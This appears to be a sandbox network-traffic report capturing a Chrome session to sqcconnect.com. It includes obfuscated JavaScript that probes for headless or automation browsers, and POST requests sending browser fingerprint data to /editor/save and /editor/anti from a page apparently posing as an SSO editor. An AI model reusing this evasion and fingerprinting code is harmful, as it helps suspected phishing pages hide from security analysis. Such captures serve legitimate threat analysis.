                                        Data Ascii: 06); else { if (_0x519d8e(0x171) !== _0x519d8e(0x171)) { const _0x270517 = _0x14d432[_0x58a934(0x2cd)](_0x1d9ad4, arguments); return _0x4104b1 = null, _0x270517; } else { if (_0x44a59f[_0x5e731b(0x284)](/firefox|fxios/i)) _0x405c69 = _0x519d8e(0x17d); els
                                        2024-12-17 14:46:18 UTC8000INData Raw: 52 62 27 20 21 3d 3d 20 5f 30 78 32 31 63 39 32 61 28 30 78 32 34 33 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 34 65 62 37 32 31 20 3d 20 5f 30 78 31 66 66 34 62 33 5b 5f 30 78 33 63 65 38 34 30 28 30 78 32 63 36 29 5d 28 5f 30 78 32 33 33 30 39 36 20 3d 3e 20 5f 30 78 32 33 33 30 39 36 5b 5f 30 78 32 31 63 39 32 61 28 30 78 31 39 32 29 5d 29 5b 5f 30 78 33 64 65 63 64 35 28 30 78 32 35 32 29 5d 28 5f 30 78 35 63 37 63 37 38 20 3d 3e 20 28 7b 20 27 6e 61 6d 65 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 32 63 63 31 33 62 28 30 78 32 38 66 29 5d 2c 20 27 6c 61 6e 67 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 33 35 61 37 33 66 28 30 78 32 61 30 29 5d 2c 20 27 64 65 66 61 75 6c 74 27 3a 20 5f 30 78 35 63 37 63 37 38 5b 5f 30 78 32 31 63 39 32 61 28
                                        Data Ascii: Rb' !== _0x21c92a(0x243)) { const _0x4eb721 = _0x1ff4b3[_0x3ce840(0x2c6)](_0x233096 => _0x233096[_0x21c92a(0x192)])[_0x3decd5(0x252)](_0x5c7c78 => ({ 'name': _0x5c7c78[_0x2cc13b(0x28f)], 'lang': _0x5c7c78[_0x35a73f(0x2a0)], 'default': _0x5c7c78[_0x21c92a(
                                        2024-12-17 14:46:18 UTC8000INData Raw: 63 28 30 78 31 37 36 29 20 21 3d 3d 20 5f 30 78 35 63 37 35 36 63 28 30 78 31 37 36 29 20 3f 20 5f 30 78 32 33 30 38 63 38 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 36 38 36 61 38 62 20 3d 20 5f 30 78 35 61 62 36 62 34 2c 20 5f 30 78 61 63 31 63 36 31 20 3d 20 6e 65 77 20 5f 30 78 31 31 32 66 66 65 28 5f 30 78 36 38 36 61 38 62 28 30 78 32 35 35 29 20 2b 20 27 5c 78 35 63 28 5c 78 32 30 2a 5c 78 35 63 29 27 29 2c 20 5f 30 78 32 62 34 64 33 36 20 3d 20 6e 65 77 20 5f 30 78 35 39 39 62 64 64 28 5f 30 78 36 38 36 61 38 62 28 30 78 32 37 34 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 62 30 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 31 34 29 20 2b 20 5f 30 78 36 38 36 61 38 62 28 30 78 32 33 64 29
                                        Data Ascii: c(0x176) !== _0x5c756c(0x176) ? _0x2308c8(this, function () { const _0x686a8b = _0x5ab6b4, _0xac1c61 = new _0x112ffe(_0x686a8b(0x255) + '\x5c(\x20*\x5c)'), _0x2b4d36 = new _0x599bdd(_0x686a8b(0x274) + _0x686a8b(0x2b0) + _0x686a8b(0x214) + _0x686a8b(0x23d)
                                        2024-12-17 14:46:18 UTC1796INData Raw: 75 72 6e 20 5f 30 78 32 64 31 30 66 36 3b 20 65 6c 73 65 20 7b 20 63 6f 6e 73 74 20 5f 30 78 34 31 32 34 39 38 20 3d 20 5b 5f 30 78 32 30 65 61 66 66 28 30 78 32 30 39 29 20 2b 20 27 6d 27 20 69 6e 20 5f 30 78 35 37 38 37 64 36 2c 20 27 5f 70 68 61 6e 74 6f 6d 27 20 69 6e 20 5f 30 78 34 34 65 31 38 63 2c 20 5f 30 78 32 30 35 62 35 34 28 30 78 32 31 30 29 20 69 6e 20 5f 30 78 35 30 36 30 39 64 2c 20 5f 30 78 35 38 35 39 66 31 28 30 78 32 34 37 29 20 69 6e 20 5f 30 78 38 31 63 65 35 35 2c 20 5f 30 78 35 33 34 66 33 64 28 30 78 32 38 64 29 20 2b 20 5f 30 78 35 33 65 64 30 30 28 30 78 32 31 31 29 20 69 6e 20 5f 30 78 32 66 34 37 37 64 2c 20 5f 30 78 39 37 31 62 37 28 30 78 32 36 64 29 20 2b 20 5f 30 78 33 32 36 34 32 33 28 30 78 32 64 37 29 20 2b 20 5f 30 78
                                        Data Ascii: urn _0x2d10f6; else { const _0x412498 = [_0x20eaff(0x209) + 'm' in _0x5787d6, '_phantom' in _0x44e18c, _0x205b54(0x210) in _0x50609d, _0x5859f1(0x247) in _0x81ce55, _0x534f3d(0x28d) + _0x53ed00(0x211) in _0x2f477d, _0x971b7(0x26d) + _0x326423(0x2d7) + _0x


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.1749734103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:17 UTC881OUTPOST /editor/save HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        Content-Length: 24822
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Origin: https://sqcconnect.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:17 UTC16384OUTData Raw: 66 69 6e 67 65 72 70 72 69 6e 74 5f 64 61 74 61 3d 25 37 42 25 32 32 72 61 77 25 32 32 25 33 41 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 64 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 6c 61 6e 64 73 63 61 70 65 2d 70 72 69 6d 61 72 79 25 32 32 25 32 43 25 32 32 70 69 78 65 6c 52 61 74 69 6f 25 32 32 25 33 41 31 25 37 44 25 32 43 25 32 32 73 79 73 74 65 6d 25 32 32 25 33 41 25
                                        Data Ascii: fingerprint_data=%7B%22raw%22%3A%7B%22screen%22%3A%7B%22width%22%3A1280%2C%22height%22%3A1024%2C%22depth%22%3A24%2C%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22orientation%22%3A%22landscape-primary%22%2C%22pixelRatio%22%3A1%7D%2C%22system%22%3A%
                                        2024-12-17 14:46:17 UTC8438OUTData Raw: 36 39 33 30 33 39 35 33 34 35 33 30 35 31 36 34 37 34 33 39 36 37 34 61 36 33 36 39 34 38 33 33 37 32 34 61 35 37 34 62 34 33 36 32 34 37 33 39 34 61 36 35 36 38 34 33 36 37 33 37 35 35 33 39 36 37 36 61 35 34 36 62 32 66 35 34 33 32 35 31 37 37 36 65 34 38 34 39 34 39 36 62 35 36 34 63 35 33 37 34 36 36 33 38 34 38 34 37 33 33 34 66 36 37 36 31 34 34 33 39 37 37 34 32 37 31 37 61 35 61 35 31 37 61 33 35 36 65 37 38 35 61 36 39 34 32 36 63 34 39 36 36 33 38 34 32 37 34 36 32 36 64 37 33 36 64 37 38 33 34 35 32 34 61 35 61 34 33 34 34 37 38 34 38 35 33 37 30 34 36 34 33 33 35 37 38 32 66 33 34 35 30 36 33 34 62 37 39 36 31 33 37 36 32 34 31 35 37 37 33 36 35 33 33 37 30 34 36 35 32 37 31 34 62 35 36 35 61 37 30 33 38 35 37 34 32 33 32 32 66 35 38 37 38 35
                                        Data Ascii: 69303953453051647439674a63694833724a574b436247394a65684367375539676a546b2f543251776e4849496b564c537466384847334f676144397742717a5a517a356e785a69426c4966384274626d736d7834524a5a434478485370464335782f3450634b796137624157736533704652714b565a70385742322f58785
                                        2024-12-17 14:46:18 UTC159INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:17 GMT
                                        Server: Apache
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-17 14:46:18 UTC146INData Raw: 38 37 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 69 64 22 3a 22 64 32 38 62 36 65 64 32 34 35 33 36 32 35 61 66 36 34 36 61 36 66 65 66 34 64 35 33 65 65 32 33 64 32 32 38 66 32 37 65 31 37 34 62 66 32 36 66 34 64 36 62 37 62 34 30 30 62 64 66 39 39 64 36 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 46 69 6e 67 65 72 70 72 69 6e 74 20 73 61 76 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 22 7d 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 87{"status":"success","id":"d28b6ed2453625af646a6fef4d53ee23d228f27e174bf26f4d6b7b400bdf99d6","message":"Fingerprint saved successfully"}0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        26192.168.2.1749733103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:17 UTC863OUTPOST /editor/anti HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        Content-Length: 1130
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Content-Type: application/json
                                        Accept: */*
                                        Origin: https://sqcconnect.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:17 UTC1130OUTData Raw: 7b 22 73 63 72 65 65 6e 57 69 64 74 68 22 3a 31 32 38 30 2c 22 73 63 72 65 65 6e 48 65 69 67 68 74 22 3a 31 30 32 34 2c 22 61 76 61 69 6c 57 69 64 74 68 22 3a 31 32 38 30 2c 22 61 76 61 69 6c 48 65 69 67 68 74 22 3a 39 38 34 2c 22 75 73 65 72 41 67 65 6e 74 22 3a 22 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 41 70 70 6c 65 57 65 62 4b 69 74 2f 35 33 37 2e 33 36 20 28 4b 48 54 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 43 68 72 6f 6d 65 2f 31 31 37 2e 30 2e 30 2e 30 20 53 61 66 61 72 69 2f 35 33 37 2e 33 36 22 2c 22 76 65 6e 64 6f 72 22 3a 22 47 6f 6f 67 6c 65 20 49 6e 63 2e 20 28 47 6f 6f 67 6c 65 29 22 2c 22 72 65 6e 64 65 72 65 72 22 3a 22 41 4e 47 4c 45 20 28 47 6f
                                        Data Ascii: {"screenWidth":1280,"screenHeight":1024,"availWidth":1280,"availHeight":984,"userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36","vendor":"Google Inc. (Google)","renderer":"ANGLE (Go
                                        2024-12-17 14:46:18 UTC150INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:17 GMT
                                        Server: Apache
                                        Content-Length: 0
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        27192.168.2.1749735104.18.95.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:18 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b3a32d2d4387&lang=auto HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/kt8az/0x4AAAAAAA0Aa6igGlTE6pvw/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:18 UTC331INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:18 GMT
                                        Content-Type: application/javascript; charset=UTF-8
                                        Content-Length: 114000
                                        Connection: close
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8f37b3af0d91c35a-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:18 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                        2024-12-17 14:46:18 UTC1369INData Raw: 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 22 3a 22 48 61
                                        Data Ascii: %3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_report":"Ha
                                        2024-12-17 14:46:18 UTC1369INData Raw: 2c 66 58 2c 66 59 2c 67 32 2c 67 33 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 34 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 34 29 29 2f 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 39 29 29 2f 33 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 33 39 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 39 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 38 29 29 2f 36 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 38 31 30 29 29 2f 37 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49
                                        Data Ascii: ,fX,fY,g2,g3,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(841))/1+parseInt(gI(1254))/2*(-parseInt(gI(1449))/3)+parseInt(gI(439))/4+-parseInt(gI(859))/5+-parseInt(gI(1108))/6*(parseInt(gI(810))/7)+-parseInt(gI
                                        2024-12-17 14:46:18 UTC1369INData Raw: 2c 27 63 66 43 68 6c 4f 75 74 53 27 3a 65 4d 5b 67 4e 28 31 37 33 39 29 5d 5b 67 4e 28 37 39 33 29 5d 2c 27 63 6f 64 65 27 3a 67 4e 28 31 34 32 38 29 2c 27 72 63 56 27 3a 65 4d 5b 67 4e 28 31 37 33 39 29 5d 5b 67 4e 28 31 37 34 33 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 36 35 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 67 4f 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 67 4f 3d 67 4a 2c 7b 27 6b 49 4b 68 75 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 2c 47 29 7b 72 65 74 75 72 6e 20 45 28 46 2c 47 29 7d 2c 27 63 6d 6f 6d 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 49 6b 65 4d 76 27 3a 67 4f 28 31 30 36 38 29 2c 27 78 4f 63 58 43 27
                                        Data Ascii: ,'cfChlOutS':eM[gN(1739)][gN(793)],'code':gN(1428),'rcV':eM[gN(1739)][gN(1743)]},'*'))},g)},eM[gJ(652)]=function(f,g,h,gO,i,j,k,l,m,n,o,s,x,B,C,D){i=(gO=gJ,{'kIKhu':function(E,F,G){return E(F,G)},'cmomK':function(E,F){return E||F},'IkeMv':gO(1068),'xOcXC'
                                        2024-12-17 14:46:18 UTC1369INData Raw: 7a 42 53 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 7d 2c 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 29 7b 69 66 28 28 66 3d 64 5b 67 50 28 31 32 38 32 29 5d 2c 64 5b 67 50 28 35 35 31 29 5d 26 26 65 5b 67 50 28 34 39 31 29 5d 28 74 79 70 65 6f 66 20 64 5b 67 50 28 35 35 31 29 5d 2c 65 5b 67 50 28 38 31 33 29 5d 29 29 26 26 28 28 6a 3d 64 5b 67 50 28 35 35 31 29 5d 5b 67 50 28 31 34 35 36 29 5d 28 27 5c 6e 27 29 2c 6a 5b 67 50 28 31 30 38 35 29 5d 3e 31 29 26 26 28 6b 3d 2f 5e 5c 73 2a 61 74 5c 73 2b 28 2e 2b 29 3a 28 5c 64 2b 29 3a 28 5c 64 2b 29 2f 2c 6c 3d 6a 5b 31 5d 5b 67 50 28 35 33 35 29 5d 28 6b 29 2c 6c 29 29 29 7b 69 66 28 67 50 28 39 31 38 29 3d 3d 3d 67 50 28 38 39 39 29 29 7b 28
                                        Data Ascii: zBS':function(n,o,s){return n(o,s)}},d instanceof Error){if((f=d[gP(1282)],d[gP(551)]&&e[gP(491)](typeof d[gP(551)],e[gP(813)]))&&((j=d[gP(551)][gP(1456)]('\n'),j[gP(1085)]>1)&&(k=/^\s*at\s+(.+):(\d+):(\d+)/,l=j[1][gP(535)](k),l))){if(gP(918)===gP(899)){(
                                        2024-12-17 14:46:18 UTC1369INData Raw: 72 65 74 75 72 6e 20 67 26 66 7d 2c 27 46 6e 69 51 62 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2d 67 7d 2c 27 73 5a 79 42 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 5e 66 7d 2c 27 46 67 4f 45 76 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 26 67 7d 2c 27 64 54 77 55 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3c 67 7d 2c 27 74 46 4d 5a 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2b 67 7d 2c 27 55 6a 47 65 50 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 3d 3d 3d 66 7d 2c 27 6e 73 4a 74 66 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 67 21 3d 3d 66 7d 2c 27
                                        Data Ascii: return g&f},'FniQb':function(f,g){return f-g},'sZyBz':function(f,g){return g^f},'FgOEv':function(f,g){return f&g},'dTwUM':function(f,g){return f<g},'tFMZK':function(f,g){return f+g},'UjGeP':function(f,g){return g===f},'nsJtf':function(f,g){return g!==f},'
                                        2024-12-17 14:46:18 UTC1369INData Raw: 63 2c 63 2c 64 2c 65 29 7b 69 63 3d 67 4a 2c 63 3d 7b 27 53 53 54 4d 68 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 4c 4f 47 72 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 7d 2c 64 3d 65 4d 5b 69 63 28 31 37 33 39 29 5d 5b 69 63 28 31 33 34 32 29 5d 7c 7c 31 65 34 2c 65 3d 63 5b 69 63 28 31 33 34 33 29 5d 28 66 51 29 2c 21 65 4d 5b 69 63 28 36 37 33 29 5d 26 26 21 63 5b 69 63 28 31 36 30 38 29 5d 28 66 76 29 26 26 21 65 4d 5b 69 63 28 31 35 30 39 29 5d 5b 69 63 28 31 37 33 33 29 5d 26 26 65 2d 66 50 3e 64 3f 66 62 28 29 3a 66 63 28 29 7d 2c 31 65 33 29 29 2c 66 54 3d 7b 7d 2c 66 54 5b 67 4a 28 31 37 33 33 29 5d 3d 21 5b 5d 2c 66 54 5b 67 4a 28 31 31 34 32 29 5d 3d 65 56 2c 66 54 5b 67
                                        Data Ascii: c,c,d,e){ic=gJ,c={'SSTMh':function(f){return f()},'LOGrj':function(f){return f()}},d=eM[ic(1739)][ic(1342)]||1e4,e=c[ic(1343)](fQ),!eM[ic(673)]&&!c[ic(1608)](fv)&&!eM[ic(1509)][ic(1733)]&&e-fP>d?fb():fc()},1e3)),fT={},fT[gJ(1733)]=![],fT[gJ(1142)]=eV,fT[g
                                        2024-12-17 14:46:18 UTC1369INData Raw: 35 32 29 5d 5b 69 75 28 37 38 32 29 5d 28 68 29 29 29 2c 78 3d 67 5b 69 75 28 36 32 37 29 5d 5b 69 75 28 36 33 36 29 5d 26 26 67 5b 69 75 28 31 37 32 38 29 5d 3f 67 5b 69 75 28 36 32 37 29 5d 5b 69 75 28 36 33 36 29 5d 28 6e 65 77 20 67 5b 28 69 75 28 31 37 32 38 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 69 76 2c 48 29 7b 66 6f 72 28 69 76 3d 69 75 2c 47 5b 69 76 28 31 33 34 34 29 5d 28 29 2c 48 3d 30 3b 6f 5b 69 76 28 31 34 32 33 29 5d 28 48 2c 47 5b 69 76 28 31 30 38 35 29 5d 29 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 69 76 28 31 31 32 34 29 5d 28 48 2c 31 29 5d 3f 47 5b 69 76 28 35 30 39 29 5d 28 48 2b 31 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c
                                        Data Ascii: 52)][iu(782)](h))),x=g[iu(627)][iu(636)]&&g[iu(1728)]?g[iu(627)][iu(636)](new g[(iu(1728))](x)):function(G,iv,H){for(iv=iu,G[iv(1344)](),H=0;o[iv(1423)](H,G[iv(1085)]);G[H]===G[o[iv(1124)](H,1)]?G[iv(509)](H+1,1):H+=1);return G}(x),B='nAsAaAb'.split('A'),
                                        2024-12-17 14:46:18 UTC1369INData Raw: 5d 28 27 6f 2e 27 2c 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 29 2c 6f 2b 2b 29 3b 7d 65 6c 73 65 20 68 5b 6e 5d 3d 69 5b 6c 5b 6d 5d 5d 5b 69 77 28 34 35 30 29 5d 28 66 75 6e 63 74 69 6f 6e 28 76 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 76 7d 29 7d 2c 65 4d 5b 67 4a 28 31 31 31 34 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 35 36 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 4f 29 7b 69 66 28 69 4f 3d 67 4a 2c 65 4d 5b 69 4f 28 31 31 31 34 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 69 4f 28 31 31 31 34 29 5d 3d 21 21 5b 5d 7d 2c 67 61 3d 30 2c 65 4e 5b 67 4a 28 31 36 31 39 29 5d 3d 3d 3d 67 4a 28 35 33 32 29 3f 65 4e 5b 67 4a 28 31 33 38 31 29 5d 28 67 4a 28 31 33 36 31 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 67 64 2c 30 29 7d 29 3a 73 65 74
                                        Data Ascii: ]('o.',i[l[m]][o]))),o++);}else h[n]=i[l[m]][iw(450)](function(v){return'o.'+v})},eM[gJ(1114)]=![],eM[gJ(564)]=function(iO){if(iO=gJ,eM[iO(1114)])return;eM[iO(1114)]=!![]},ga=0,eN[gJ(1619)]===gJ(532)?eN[gJ(1381)](gJ(1361),function(){setTimeout(gd,0)}):set
